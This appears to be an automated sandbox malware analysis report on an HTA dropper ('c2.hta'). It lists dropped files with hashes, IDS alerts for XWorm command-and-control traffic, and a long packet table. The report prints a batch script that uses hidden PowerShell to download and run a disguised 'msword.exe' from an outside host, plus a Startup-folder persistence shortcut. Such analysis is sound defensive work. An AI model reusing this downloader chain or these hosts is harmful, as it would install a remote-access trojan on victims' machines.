Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\downloaded.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	461
Entropy (8bit):	5.063477857663401
Encrypted:	false
SSDEEP:	12:wmMDys81kkGr5ZDRN3is81kkGVX5OQ981kvYX53RP:wmMDXRrLRtHRxUkvYX53RP
MD5:	FB49C7A1DD4185A21E27F13BD77DF648
SHA1:	1D18E9ADF579FDF62F819C700E09BBB6863016C3
SHA-256:	D45D2BD7AC43796F2087198349FE8817F6AAF48484A4B356BD61A76A9631B740
SHA-512:	73174D0AF92471FA0C65C16ECD9369AEB07CC15477B1B41B66EB6A4B52F1B76490D43639E8CDE8137FCE8794867E6AF074CCC6D0819100D0A4726C1995F0BC8A
Malicious:	true
Preview:	@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/f.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %temp%\f.pdf"..cd %temp%..start f.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url% -OutFile %temp%\msword.zip"..powershell -WindowStyle Hidden -Command "Expand-Archive -Path %temp%\msword.zip -DestinationPath %temp%\msword -Force"..cd %temp%\msword..start msword.exe

C:\Users\user\AppData\Local\Temp\f.pdf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 4 pages
Category:	dropped
Size (bytes):	276302
Entropy (8bit):	7.83317883790279
Encrypted:	false
SSDEEP:	6144:f7TySmt1MtVReLAaFQfz33NKy1zdp7Vum1S6rpn7p5Xc7:jGSFUAaFInNKy1Dn1fn7plc7
MD5:	950557F66ABA12BF2797E9FC134B3DAA
SHA1:	B882BB3263A69B482C9914A6E2ADA437512C06BD
SHA-256:	7EC84FF21725BFFDE7F1301C5C3C34810FB1F92D690DBDDE3716860891E0588F
SHA-512:	03213B75B8383196478F20D0031C8E075D11FED31B89671405E48596F477955688AE234AE44A757E7931E4D5DF7846C644583FA2C60AC670596D219A99C88B91
Malicious:	true
Preview:	%PDF-1.4..%......1 0 obj..<< .. /BitsPerComponent 1 .. /ColorSpace 3 0 R .. /Height 3288 .. /Subtype /Image .. /Type /XObject .. /Width 2560 .. /Filter [.. /CCITTFaxDecode ].. .. /DecodeParms [.. << .. /BlackIs1 true .. /Columns 2560 .. /K -1 .. /Rows 3288 .. >>.. ].. .. /Length 2 0 R .. >>..stream..&.>.....m.F.....A.....d.......'d....r.d...9..x8...A....m...9...# U.a.Hs.f..@.....$..Xk w....nENS`f@....`...W.9....q.(.L).....`..M%..A...l.."m^@...B.g6...P....4.q..N...)...(......r..Jr......qY.H.D.v.Dq...$X.........T..$.g.^dH.A.9..A......Lz..d.l..A.C[.........e....E....L.... ...........<.P...$...8k......................&..}...?...............s5...~........._........_...........H...hLP.<..3"...4...."....#.5\.?...3......A...S..y+.BJD.. b!......x(]......T. A.< ._O_P.%.Z......"sK.5..G...!q.H.I'..E.D=..!....%t......g.#.;.H.gA.8........F.j.....:^...Y...H...P`.A.!....e.'.Ma.i.}8M{. ...D. .!..B. ..v.z.p.i='K.J...#.

C:\Users\user\AppData\Local\Temp\msword.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3802499
Entropy (8bit):	4.6033990571172305
Encrypted:	false
SSDEEP:	24576:cvQoCg23M7h2IqMNR4WbINxZAQlB+U0zUc:QQvg23M5R4WbI3LlAU0Uc
MD5:	AC1BB7433BD4A06FA226CFD057526675
SHA1:	A954C6F43448A85C209CA49408F02FF62A2EE08D
SHA-256:	CE5E1DBA0DFF8A00221D668D1E6B64419D57073F602CC12EEDFB8CCD46B403EB
SHA-512:	A0400A7A4C71C5725BF9295C7EB9F6E5C63C2ECA949F922C2A4C31C873EE72F595DBF70ED212CAE2B887E51B89D69F2446288227174A63F9A9429F1EBC888927
Malicious:	true
Preview:	PK..........\Y.F.%..:....5....msword.exe..\|T.?~.G.l.E...4BP....(qA......f.....@.9.h.&.....Zko.....[..J[+Q..@..Z........QW.a..............~...g.9..<...sf....#.M.$;.iJR.$.\|...4...H....e-.....6eYm..+.Y}.}.w.b.J.........V....,.o....rJ.mL..[.f]..Lr.5uJ6......vL....<X0e0...b..Q.z.....) K.lK.....n.uIVK.%G.V....$.$.j.....'.VI..%[.W.....i....&.H.........Iz.2>..g..........<5HZ2X..........Du.:....'..h..sa.%i...K.T.......#.>...&.0i....V..F.....:qE..........V...yN..FZ..S......K....5.....X..;p.............uN.:........n#...YR...05..9M.a.l.......C..#x...O...G.H_.#EegL>&..C.Q..&%cdy=.F..[]/.B...q~.z....f..v..........r..s.\.......?.C.Q=..v.&.zNv..m.;xaL..D.).....r..@k.#.Y.802.\|..3{Y.sm^a..~.<S]j..d..F-ThjU..:g..n....t.....Y....f^.,....eL..L.<..."=.........O...x....S(_...z..n.]bof......}.d.fu..U.p.[............X...4..mV.6+qIo.].l...jq.....r..z...`..5ZX.EUD.._.c..v...s.42...._,.%(.q........@.g.....T..];.....4.;..r46.:.Wl....XneO.....hc{.\|...z.,j

C:\Users\user\AppData\Local\Temp\msword\msword.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	891289591
Entropy (8bit):	4.230074047814782
Encrypted:	false
SSDEEP:
MD5:	C744E054E4EF01832BBF43B81D397B61
SHA1:	3360299F013BCD729FD1993280B9304605457238
SHA-256:	4EC9AD5867629EBDC9655123B138CBE63F7ED1EDFF2022B493DD075BD06C4E3D
SHA-512:	4DAC02819D1F0B2A56FD1131BDD6B64821B40A3403111DCF5EC58CB688778E8293BC1D41693AA3DC369B0A63A9967FF0CD641F0A2AD8B2678A9E1A0079A523FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8............@..................................(....@.................................4........@...o..............h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....o...@...p..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	99
Entropy (8bit):	4.86630012026824
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYoUkh4E2J5mJ17ufLOcsaYuPA/y:HRYF5yjo923mf7YswIy
MD5:	7FFD77C45FD7B3FDA0B91E61FD21C885
SHA1:	3D5582D011F72362BDCB2D3CD292D627E7DEF601
SHA-256:	88D7B7569D28FFFEAEB8EDF8195B6B03C49C43385CE1B29938162A0F319A4D1A
SHA-512:	507DBF3C10D87B284A4D6425D15A050C92AE40E7812C7DA5BDFCDA6A3B114A84463F6E4C7F2D8E9791BDC1B218D38EF631AD7545329248A1D0F2D8A84B3A57CB
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" ..

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (3883), with CRLF line terminators
Entropy (8bit):	5.527906359882574
TrID:	HyperText Markup Language (12001/1) 66.65% HyperText Markup Language (6006/1) 33.35%
File name:	c2.hta
File size:	4'254 bytes
MD5:	4eb412ad93706e0c425f95cd83c34102
SHA1:	92304ce0960c7f12e9f865eb18a92b9cc1550941
SHA256:	f3408814ea583472da2988651a76480aef59d405e45bd8021bae688e97c008c2
SHA512:	413740b253a4c8c5f04bd1b5202a9a710ad082023be36fff122836e626c9f8758ebc5a6ceda61c766ed917bb3c48c24d9c09d514aecb2627d42b5c3044145929
SSDEEP:	96:jy0elwYTjoZJB9o3+8s9VyAK5QUjLD9izu/Vg7GzN9bbR3gzP:ClwYfosuz98A0PLD9yudg7GOP
TLSH:	E99120567F84D2C31353AF65B23702C6DA729C93F891D403B311BEA23A1A939D9CE671
File Content Preview:	<html>..<head>.. <HTA:APPLICATION.. ID="SilentHTA".. APPLICATIONNAME="Hidden HTA".. WINDOWSTATE="minimize".. SHOWINTASKBAR="no".. SINGLEINSTANCE="yes".. SCROLL="no".. >.. <script type="text/javascript">..

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T09:51:12.000071+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.5	49996	87.120.117.152	7007	TCP
2024-12-10T09:51:15.726461+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.117.152	7007	192.168.2.5	49996	TCP
2024-12-10T09:51:15.726461+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	87.120.117.152	7007	192.168.2.5	49996	TCP
2024-12-10T09:51:45.726380+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.117.152	7007	192.168.2.5	49996	TCP
2024-12-10T09:51:45.726380+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	87.120.117.152	7007	192.168.2.5	49996	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 09:47:57.921032906 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:57.921084881 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:57.921170950 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:57.928024054 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:57.928040028 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:59.205998898 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:59.206079960 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:59.335968018 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:59.336013079 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:59.336517096 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:59.336596966 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:59.339066029 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:59.383341074 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:59.714092970 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:59.714181900 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:47:59.714253902 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:59.717199087 CET	49706	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:47:59.717227936 CET	443	49706	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:01.054939985 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:01.054999113 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:01.055094004 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:01.060978889 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:01.060997963 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.333328962 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.333445072 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:02.347481012 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:02.347511053 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.347835064 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.357109070 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:02.399334908 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.804480076 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.804506063 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.804589033 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:02.804620028 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:02.846649885 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.004889011 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.004900932 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.004951000 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.004980087 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.005002022 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.005019903 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.005043983 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.053423882 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.053453922 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.053540945 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.053554058 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.053603888 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.186757088 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.186779976 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.186841965 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.186872959 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.186916113 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.215105057 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.215123892 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.215174913 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.215187073 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.215245962 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.243069887 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.243093967 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.243149996 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.243160009 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.243196964 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.243206024 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.372515917 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.372539043 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.372617960 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.372644901 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.372689962 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.394594908 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.394610882 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.394735098 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.394752979 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.394793987 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.417838097 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.417854071 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.417907953 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.417932034 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.417972088 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.437720060 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.437738895 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.437797070 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.437812090 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.437850952 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.453356981 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.453382969 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.453432083 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.453444958 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.453479052 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.453501940 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.468386889 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.468403101 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.468461990 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.468475103 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.468530893 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.509360075 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.509377003 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.509435892 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.509466887 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.509509087 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.574449062 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.574466944 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.574534893 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.574563980 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.574580908 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.574651003 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.586071014 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.586086988 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.586158037 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.586168051 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.586210966 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.597137928 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.597156048 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.597209930 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.597219944 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.597250938 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.597268105 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.607455015 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.607471943 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.607531071 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.607542992 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.607578039 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.607585907 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.610651970 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.610713005 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.610718966 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.610733032 CET	443	49708	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:03.610764027 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.610780001 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:03.622095108 CET	49708	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:04.911216974 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:04.911261082 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:04.911333084 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:04.914805889 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:04.914819956 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.184820890 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.184892893 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.208812952 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.208834887 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.209093094 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.216316938 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.263341904 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.655376911 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.655405998 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.655469894 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.655492067 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.721613884 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.851522923 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.851540089 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.851599932 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.851613998 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.851617098 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.851636887 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.851665020 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.851685047 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.902126074 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.902142048 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.902209997 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:06.902223110 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:06.902259111 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.037446976 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.037477970 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.037533998 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.037553072 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.037574053 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.037645102 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.065977097 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.065996885 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.066076994 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.066092014 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.066260099 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.091897011 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.091917992 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.091972113 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.091989994 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.092040062 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.092060089 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.151839972 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.151870012 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.151901007 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.151947021 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.151953936 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.152036905 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.233794928 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.233817101 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.233869076 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.233889103 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.233916044 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.233923912 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.250664949 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.250699997 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.250781059 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.250793934 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.250845909 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.265367031 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.265384912 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.265450954 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.265459061 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.265505075 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.265525103 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.280625105 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.280639887 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.280700922 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.280706882 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.281028986 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.292582989 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.292598009 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.292645931 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.292651892 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.292679071 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.292701006 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.414258957 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.414278030 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.414326906 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.414345026 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.414378881 CET	49711	443	192.168.2.5	193.26.115.21
